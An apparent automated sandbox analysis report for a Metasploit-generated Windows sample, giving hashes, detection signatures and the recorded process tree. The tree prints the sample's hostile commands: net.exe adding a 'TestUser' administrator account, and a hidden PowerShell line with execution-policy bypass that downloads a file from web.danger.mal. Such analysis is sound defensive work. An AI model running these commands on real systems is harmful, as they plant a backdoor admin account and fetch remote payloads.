Analysis
-
max time kernel
93s -
max time network
134s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 17:35
Behavioral task
behavioral1
Sample
sample1.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
sample1.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
sample2.exe_
Resource
ubuntu2004-amd64-20240508-en
General
-
Target
sample1.exe
-
Size
83KB
-
MD5
dec37e4b834cf3a9a78475fec06255db
-
SHA1
bc6a9f3dd99e40dfe34ba8c64401027a3d86d2bc
-
SHA256
075a8576bb2f75bf56cfa8c88727011ac66f176ca5abe2a78978c556577e5058
-
SHA512
8402a9206285014fe6ab3752433835a7f907406d2c5fb23204a567d3f9940c844578ee525c64b6a67d81bf0983e7d3972fb2380d822cc9fd08eec098749d4a77
-
SSDEEP
1536:Icus7AQXjNta73Jah9UFBD3JMb+KR0Nc8QsJq3Gnq3+/q3DlHq3/:lAYhta7ouJe0Nc8QsCzDDm/
Malware Config
Extracted
http://web.danger.mal/danger
Extracted
metasploit
windows/exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
sample1.execmd.exenet.exenet.exedescription pid process target process PID 716 wrote to memory of 1732 716 sample1.exe cmd.exe PID 716 wrote to memory of 1732 716 sample1.exe cmd.exe PID 716 wrote to memory of 1732 716 sample1.exe cmd.exe PID 1732 wrote to memory of 4740 1732 cmd.exe net.exe PID 1732 wrote to memory of 4740 1732 cmd.exe net.exe PID 1732 wrote to memory of 4740 1732 cmd.exe net.exe PID 4740 wrote to memory of 448 4740 net.exe net1.exe PID 4740 wrote to memory of 448 4740 net.exe net1.exe PID 4740 wrote to memory of 448 4740 net.exe net1.exe PID 1732 wrote to memory of 3068 1732 cmd.exe net.exe PID 1732 wrote to memory of 3068 1732 cmd.exe net.exe PID 1732 wrote to memory of 3068 1732 cmd.exe net.exe PID 3068 wrote to memory of 1544 3068 net.exe net1.exe PID 3068 wrote to memory of 1544 3068 net.exe net1.exe PID 3068 wrote to memory of 1544 3068 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample1.exe"C:\Users\Admin\AppData\Local\Temp\sample1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net user TestUser S3cret^S3cret /ADD && net localgroup Administrators TestUser /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet user TestUser S3cretS3cret /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user TestUser S3cretS3cret /ADD4⤵
-
C:\Windows\SysWOW64\net.exenet localgroup Administrators TestUser /ADD3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators TestUser /ADD4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy bypass -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('http://web.danger.mal/danger','C:/danger')"2⤵
- Command and Scripting Interpreter: PowerShell